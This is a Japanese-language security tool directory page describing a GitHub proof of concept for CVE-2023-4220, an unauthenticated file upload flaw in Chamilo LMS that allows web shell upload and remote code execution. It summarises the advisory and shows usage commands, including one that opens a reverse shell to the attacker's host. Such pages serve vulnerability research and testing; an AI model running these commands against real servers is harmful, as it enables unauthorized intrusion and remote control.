Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-4226-POC — CVE-2023-4220 - Chamilo LMS 未認証大容量ファイルアップロードによるリモートコード実行のPoC | Kitploit
ツール/GitHubGitHub/krishnan-tech/cve-2023-4226-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubkrishnan-tech/cve-2023-4226-poc

CVE-2023-4226-POC

CVE-2023-4220 - Chamilo LMS 未認証大容量ファイルアップロードによるリモートコード実行のPoC

リポジトリを見る
1112年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-4220 PoC

CVE-2023-4220 の詳細: StarLabs Advisory

概要

製品Chamilo
ベンダーChamilo
深刻度高 - 攻撃者はソフトウェアの脆弱性を悪用して、認証なしのリモートコード実行を達成する可能性があります。
影響を受けるバージョン<= v1.11.24
テスト済みバージョンv1.11.24 (執筆時点の最新版)
CVE 識別子CVE-2023-4220
CVE 説明Chamilo LMS <= v1.11.24 の /main/inc/lib/javascript/bigupload/inc/bigUpload.php における大容量ファイルアップロード機能の無制限ファイルアップロードにより、未認証の攻撃者が Web シェルをアップロードして、保存型クロスサイトスクリプティング攻撃を実行し、リモートコード実行を達成できる可能性があります。
CWE 分類CWE-434: 危険なタイプのファイルの無制限アップロード
CAPEC 分類CAPEC-650: Web サーバーへの Web シェルのアップロード

概念実証 (PoC)

コマンドを直接実行する

コマンドを直接実行するには、次のコマンドを使用します:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami

リバースシェルを取得する

リバースシェルを取得するには、次のコマンドを使用します:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>

ツールをダウンロード